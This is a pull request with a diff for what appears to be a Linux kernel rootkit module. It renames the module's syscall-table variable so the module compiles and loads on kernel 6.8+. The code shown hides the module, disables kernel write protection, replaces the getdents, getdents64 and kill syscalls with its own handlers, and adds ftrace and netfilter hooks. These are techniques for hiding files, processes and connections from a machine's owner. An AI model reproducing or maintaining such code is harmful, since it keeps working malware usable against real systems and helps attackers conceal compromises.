### PR TITLE
Fix compilation error: conflicting types for 'sys_call_table' on Linux Kernel 6.8+

### DIFF
--- a/kernelspace/bds_lkm.c
+++ b/kernelspace/bds_lkm.c
@@ -32,21 +32,21 @@ static int bds_start(void) {
 	int err;
 	
 	bds_hide();
-	sys_call_table = get_syscall_table();
-	if (!sys_call_table) {
+	g_syscall_table = get_syscall_table();
+	if (!g_syscall_table) {
 		printk("[-] exit");
 		return -1;
 	}
 	cr0 = read_cr0();
-	orig_getdents = (t_syscall)sys_call_table[__NR_getdents];
-	orig_getdents64 = (t_syscall)sys_call_table[__NR_getdents64];
-	orig_kill = (t_syscall)sys_call_table[__NR_kill];
+	orig_getdents = (t_syscall)g_syscall_table[__NR_getdents];
+	orig_getdents64 = (t_syscall)g_syscall_table[__NR_getdents64];
+	orig_kill = (t_syscall)g_syscall_table[__NR_kill];
         
 	err = fh_install_hooks(hooks, ARRAY_SIZE(hooks));
 	unprotect_memory();
-	sys_call_table[__NR_getdents] = (unsigned long) bds_getdents;
-	sys_call_table[__NR_getdents64] = (unsigned long) bds_getdents64;
-	sys_call_table[__NR_kill] = (unsigned long) bds_kill;
+	g_syscall_table[__NR_getdents] = (unsigned long) bds_getdents;
+	g_syscall_table[__NR_getdents64] = (unsigned long) bds_getdents64;
+	g_syscall_table[__NR_kill] = (unsigned long) bds_kill;
 	protect_memory();
 	nfho = (struct nf_hook_ops*)kcalloc(1, sizeof(struct nf_hook_ops), GFP_KERNEL);
 	nfho->hook  = (nf_hookfn*)bds_nf_hook;      
@@ -64,9 +64,9 @@ static int bds_start(void) {
 static void bds_end(void) {
 	fh_remove_hooks(hooks, ARRAY_SIZE(hooks));
 	unprotect_memory();
-	sys_call_table[__NR_getdents] = (unsigned long) orig_getdents;
-	sys_call_table[__NR_getdents64] = (unsigned long) orig_getdents64;
-	sys_call_table[__NR_kill] = (unsigned long) orig_kill;
+	g_syscall_table[__NR_getdents] = (unsigned long) orig_getdents;
+	g_syscall_table[__NR_getdents64] = (unsigned long) orig_getdents64;
+	g_syscall_table[__NR_kill] = (unsigned long) orig_kill;
     
 	protect_memory();
 	nf_unregister_net_hook(&init_net, nfho);

--- a/kernelspace/includes/bds_vars.h
+++ b/kernelspace/includes/bds_vars.h
@@ -18,7 +18,7 @@
 	static asmlinkage int (*orig_tcp6_seq_show)(struct seq_file *seq, void *v);
 	
 	unsigned long cr0;
-	static unsigned long *sys_call_table;
+	static unsigned long *g_syscall_table;
 	static struct nf_hook_ops *nfho = NULL;
 	struct cred *cred;
 	char *kpathname;


### PR DESCRIPTION
## Description
This PR fixes a compilation error encountered on newer Linux Kernels (e.g., 6.8.0-90-generic on Ubuntu 24.04).

## The Issue
When compiling on Kernel 6.8+, the build fails with the following error:
```text
error: conflicting types for ‘sys_call_table’; have ‘long unsigned int *’
note: previous declaration of ‘sys_call_table’ with type ‘long int (* const[])(const struct pt_regs *)’

```

This is caused by a name collision between the local variable `sys_call_table` defined in `bds_vars.h` and the symbol exported by the kernel headers in `arch/x86/include/asm/syscall.h`.

## The Fix

Renamed the local global variable from `sys_call_table` to `g_syscall_table` in:

* `includes/bds_vars.h`
* `bds_lkm.c`

This avoids the conflict with the kernel headers while preserving the original logic.

## Verification

* [x] Successfully compiled on Linux Kernel 6.8.0-90-generic (x86_64).
* [x] Module loads successfully.
